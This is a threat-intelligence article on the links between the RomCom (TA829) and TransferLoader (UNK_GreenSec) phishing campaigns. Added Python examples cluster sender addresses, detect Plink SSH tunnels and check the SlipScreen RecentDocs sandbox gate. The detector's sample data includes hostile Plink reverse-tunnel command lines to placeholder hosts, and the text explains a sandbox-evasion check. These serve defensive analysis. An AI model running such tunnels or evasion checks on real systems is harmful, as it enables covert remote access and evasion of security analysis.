
Cybersecurity researchers have flagged tactical similarities between the threat actor behind the RomCom RAT and a cluster that has been observed delivering a loader dubbed TransferLoader.
Enterprise security firm Proofpoint tracks the activity associated with TransferLoader as a group it calls UNK_GreenSec, and the RomCom RAT operators under the moniker TA829. The latter is also known as CIGAR, Nebulous Mantis, Storm-0978, Tropical Scorpius, UAC-0180, UAT-5647, UNC2596, and Void Rabisu.
The company said it discovered UNK_GreenSec as part of its investigation into TA829, noting that the cluster uses "similar infrastructure, distribution tactics, landing pages and email lure themes."
TA829 is something of an unusual hacking group in the threat landscape given its ability to carry out both espionage and financially motivated attacks. The Russia-aligned hybrid group has also been linked to the zero-day exploitation of security flaws in Mozilla Firefox and Microsoft Windows to deliver RomCom RAT in attacks against targets worldwide.
Earlier this year, PRODAFT detailed the threat actor's use of bulletproof hosting providers, living-off-the-land tactics, and encrypted command-and-control (C2) communications to sidestep detection.
TransferLoader, for its part, was first documented by Zscaler ThreatLabz in connection with a February 2025 campaign.
Proofpoint noted that campaigns run by both TA829 and UNK_GreenSec rely on REM Proxy services deployed on compromised MikroTik routers as upstream infrastructure. That said, the exact method used to breach these devices is not known.

"REM Proxy devices are likely rented to users to relay traffic," the Proofpoint threat research team said. "In the observed campaigns, both TA829 and UNK_GreenSec use the service to relay traffic to new accounts at freemail providers, which then send messages to the targets. The REM Proxy service has also been used to launch similar campaigns via email accounts compromised by TA829."
Given the similar format of the sender addresses, it is likely that the threat actors are using an email builder utility that facilitates the creation of accounts and the sending of phishing emails through the REM Proxy nodes.
The messages act as a conduit for delivering links that are either embedded directly in the body or placed inside a PDF attachment. When clicked, a link triggers a series of redirects that ultimately take the victim to a fake Google Drive or Microsoft OneDrive page, but only after filtering out machines the attacker deems uninteresting.
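The page does not spell out the sender-address format that gave the accounts away, but the underlying triage technique is simple: reduce each address to a structural template and look for unusually large clusters of same-shaped accounts at one freemail provider. The following Python is an added example, not Proofpoint's tooling or anything from the article; the addresses, the freemail.example domain and the cluster threshold are all constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample sender addresses (not from the article). The freemail.example
# domain is a placeholder; the page names no provider and no address pattern.
SENDERS = [
    "anna.kowalski73@freemail.example",
    "mark.jensen41@freemail.example",
    "lucia.ferrer88@freemail.example",
    "peter.novak19@freemail.example",
    "hr-team@corp-partner.example",
    "newsletter@shop.example",
    "j.doe@freemail.example",
]


def address_shape(addr: str) -> str:
    """Reduce an address to a structural template.

    Runs of letters become 'a', runs of digits become '9', separators are kept.
    The domain is kept verbatim so templates are only compared within one provider,
    which is where a builder utility would be registering accounts in bulk.
    """
    local, _, domain = addr.lower().rpartition("@")
    shape = re.sub(r"[a-z]+", "a", local)
    shape = re.sub(r"\d+", "9", shape)
    return f"{shape}@{domain}"


def cluster_by_shape(addresses, min_cluster: int = 3) -> dict:
    """Group addresses by template; return clusters of at least min_cluster members,
    largest first. Organic senders spread across many templates, while accounts minted
    by the same builder tend to collapse onto one. The threshold is an assumption to
    tune against your own mail volume."""
    groups = defaultdict(list)
    for addr in addresses:
        groups[address_shape(addr)].append(addr)
    suspicious = {k: v for k, v in groups.items() if len(v) >= min_cluster}
    return dict(sorted(suspicious.items(), key=lambda kv: -len(kv[1])))


if __name__ == "__main__":
    for shape, members in cluster_by_shape(SENDERS).items():
        print(f"{shape}: {len(members)} senders -> {members}")
```

Run over a day of inbound mail logs, the output is a short list of templates worth a closer look; the template itself (for example `a.a9@provider`) then becomes a cheap pivot for the rest of the campaign's messages.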

It is at this stage that the attack splits in two, since the targets are redirected to different adversary infrastructure: the chain ends with TransferLoader in the case of UNK_GreenSec and with a malware family called SlipScreen in the case of TA829.
"Both TA829 and UNK_GreenSec have deployed PuTTY's Plink utility to set up SSH tunnels, and both have used the IPFS service to host those utilities in follow-on activity," Proofpoint said.
SlipScreen is a first-stage loader designed to decrypt and load shellcode directly into memory and begin communicating with a remote server, but only after a Windows Registry check that ensures the target machine has at least 55 recent documents, based on the key "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs". The check is a sandbox-evasion gate: a freshly built analysis VM rarely carries that much user document history.
The infection sequence is then used to deploy a downloader named MeltingClaw (aka DAMASCENED PEACOCK) or RustyClaw, which in turn drops backdoors like ShadyHammock and DustyHammock, the former being used to launch SingleCamper (aka SnipBot), an updated version of the RomCom RAT.
In addition to running reconnaissance commands on infected systems, DustyHammock can also download additional payloads hosted on the InterPlanetary File System (IPFS) network.
Campaigns propagating TransferLoader are known to use job-opportunity-themed messages to trick victims into clicking links that ostensibly lead to a PDF résumé but in fact download TransferLoader from IPFS webshare.
The main purpose of TransferLoader is to fly under the radar and deliver further malware, such as Metasploit and Morpheus ransomware, the latter a rebranded version of HellCat ransomware.
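Plink is a legitimate administration tool, so hunting for it by file name is weak; the tunnel is visible in the arguments instead. The Python below is an added example of argument-based detection over process-creation records, not Proofpoint's logic or anything from the article. The log records, hostnames and addresses are constructed, and the severity scoring is an assumption; the Plink switches used (-ssh, -P, -N, -batch, -pw, -R, -L, -D) are real PuTTY options.

```python
# Constructed Sysmon/EDR-style process-creation records (not from the article):
# (timestamp, host, image path, command line). Hosts and IPs are placeholders.
SAMPLE_EVENTS = [
    ("2025-06-02T09:14:03Z", "WS-0142", r"C:\Users\Public\plink.exe",
     "plink.exe -ssh -P 443 -N -batch -pw s3cr3t "
     "-R 0.0.0.0:3389:127.0.0.1:3389 relay@203.0.113.10"),
    ("2025-06-02T09:20:11Z", "WS-0142", r"C:\Program Files\PuTTY\plink.exe",
     "plink.exe -ssh -batch admin@10.0.0.5 uptime"),
    # Same tool copied under a benign-looking name: the name changes, the flags do not.
    ("2025-06-02T09:31:47Z", "WS-0177", r"C:\Users\Public\svchost.exe",
     "svchost.exe -N -L 8080:127.0.0.1:80 user@198.51.100.7 -P 22"),
    ("2025-06-02T09:40:00Z", "WS-0190", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

# Plink port-forwarding switches and what they mean for the host.
TUNNEL_FLAGS = {
    "-R": "remote port forward (reverse tunnel back into the host)",
    "-L": "local port forward",
    "-D": "dynamic SOCKS proxy",
}


def analyze_plink(cmdline: str):
    """Return a finding for a Plink-style SSH tunnel command line, or None.

    The rule keys on the forwarding switches plus a user@host target rather than
    on the binary name, so a renamed copy is still caught. -ssh is not required
    because Plink defaults to SSH when no protocol switch is given.
    """
    argv = cmdline.split()
    flags = {a for a in argv if a.startswith("-")}
    tunnels = [f for f in TUNNEL_FLAGS if f in flags]
    target = next((a for a in argv if "@" in a), None)
    if not tunnels or (target is None and "-ssh" not in flags):
        return None

    def arg_after(flag):
        i = argv.index(flag)
        return argv[i + 1] if i + 1 < len(argv) else None

    port = arg_after("-P") if "-P" in flags else "22"
    reasons = [f"{f}: {TUNNEL_FLAGS[f]} {arg_after(f)}" for f in tunnels]
    if "-N" in flags:
        reasons.append("-N: no remote shell requested, tunnel-only session")
    if "-pw" in flags:
        reasons.append("-pw: password supplied on the command line")
    if port != "22":
        reasons.append(f"-P {port}: SSH on a non-standard port")
    # Assumed scoring: a reverse tunnel (-R) exposes the victim to the remote side.
    severity = "high" if "-R" in flags else "medium"
    return {"target": target, "port": port, "severity": severity, "reasons": reasons}


def hunt(events):
    """Run the rule over (timestamp, host, image, cmdline) records and collect findings."""
    findings = []
    for ts, host, image, cmd in events:
        finding = analyze_plink(cmd)
        if finding:
            finding.update(timestamp=ts, host=host, image=image,
                           renamed=not image.lower().endswith("\\plink.exe"))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']} {f['image']} -> {f['target']}:{f['port']}")
        for r in f["reasons"]:
            print("   ", r)
```

In a real deployment the `renamed` flag is worth pairing with the PE's original file name from the EDR record, since the command-line rule alone cannot prove which binary ran.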
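A practical consequence of the RecentDocs gate is that an analysis VM needs enough recent-document history before SlipScreen will detonate. The Python below is an added example, not SlipScreen's code or anything from Proofpoint: it parses a `reg export` dump of the RecentDocs key and reports whether the host would clear the 55-entry threshold. The exported text is constructed inline, and the assumption that the loader counts the numbered values directly under the key (not the per-extension subkeys or the MRUListEx index) is mine; the page states only the threshold and the key path.

```python
import re

RECENTDOCS_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs"
SLIPSCREEN_THRESHOLD = 55  # from the article: at least 55 recent documents


def _hex_utf16(s: str) -> str:
    """Encode a string as the comma-separated hex used for REG_BINARY in .reg files."""
    return ",".join(f"{b:02x}" for b in (s + "\x00").encode("utf-16-le"))


def build_reg_export(n_docs: int) -> str:
    """Constructed .reg export (stand-in for 'reg export' output) of a RecentDocs key
    with n_docs numbered values, an MRUListEx index, and one per-extension subkey.
    File names are hypothetical."""
    lines = ["Windows Registry Editor Version 5.00", "", f"[{RECENTDOCS_KEY}]"]
    mru = [f"{b:02x}" for i in range(n_docs) for b in i.to_bytes(4, "little")] + ["ff"] * 4
    lines.append('"MRUListEx"=hex:' + ",".join(mru))
    for i in range(n_docs):
        lines.append(f'"{i}"=hex:{_hex_utf16(f"report{i}.docx")}')
    lines += ["", f"[{RECENTDOCS_KEY}\\.docx]", '"MRUListEx"=hex:ff,ff,ff,ff']
    return "\n".join(lines) + "\n"


def parse_reg_export(text: str) -> dict:
    """Minimal .reg parser returning {key_path: {value_name: raw_data}}.
    Joins the backslash line continuations reg.exe emits for long hex values."""
    logical, buf = [], ""
    for line in text.splitlines():
        buf = buf + line.strip() if buf else line.rstrip()
        if buf.endswith("\\"):
            buf = buf[:-1]
            continue
        logical.append(buf)
        buf = ""
    keys, current = {}, None
    for line in logical:
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)', line)
            if m:
                keys[current][m.group(1)] = m.group(2)
    return keys


def count_recent_docs(text: str) -> int:
    """Count the numbered values ("0", "1", ...) directly under RecentDocs.
    Assumption (not stated on the page): this is what the 55-entry gate counts."""
    values = parse_reg_export(text).get(RECENTDOCS_KEY, {})
    return sum(1 for name in values if name.isdigit())


def passes_slipscreen_gate(text: str, threshold: int = SLIPSCREEN_THRESHOLD) -> bool:
    """True if the exported key would satisfy the loader's environment check."""
    return count_recent_docs(text) >= threshold


if __name__ == "__main__":
    for n in (12, 60):
        dump = build_reg_export(n)
        print(f"{n} entries -> gate passes: {passes_slipscreen_gate(dump)}")
```

On a live Windows host the same count comes from `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" recent.reg`, and a sandbox image that fails the gate needs its user profile seeded with document activity before the sample will run.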

"Unlike the TA829 campaigns, the JavaScript component of the TransferLoader campaigns redirected users to different PHP endpoints on the same server, allowing operators to perform additional server-side filtering," Proofpoint said. "UNK_GreenSec used dynamic landing pages, but in many cases they were unrelated to the OneDrive spoof and redirected to the final payload stored in IPFS webshare."
The overlapping tradecraft between TA829 and UNK_GreenSec points to one of four possibilities:
- Both threat actors source distribution and infrastructure from the same third-party provider
- TA829 acquires and distributes the infrastructure on its own and provides those services to UNK_GreenSec
- UNK_GreenSec is the supplier and TA829 is the customer
- TA829 and UNK_GreenSec are the same, and TransferLoader is a new addition to their malware arsenal
"In the current threat landscape, points of overlap between cybercrime and espionage continue to increase, eliminating the distinct barriers that separate criminal and state actors," Proofpoint said. "Campaigns, indicators, and threat actor behaviors have converged, making attribution and clustering within the ecosystem more difficult."
"There is not enough evidence to demonstrate the exact nature of the relationship between TA829 and UNK_GreenSec, but there is a very high likelihood of a link between the groups."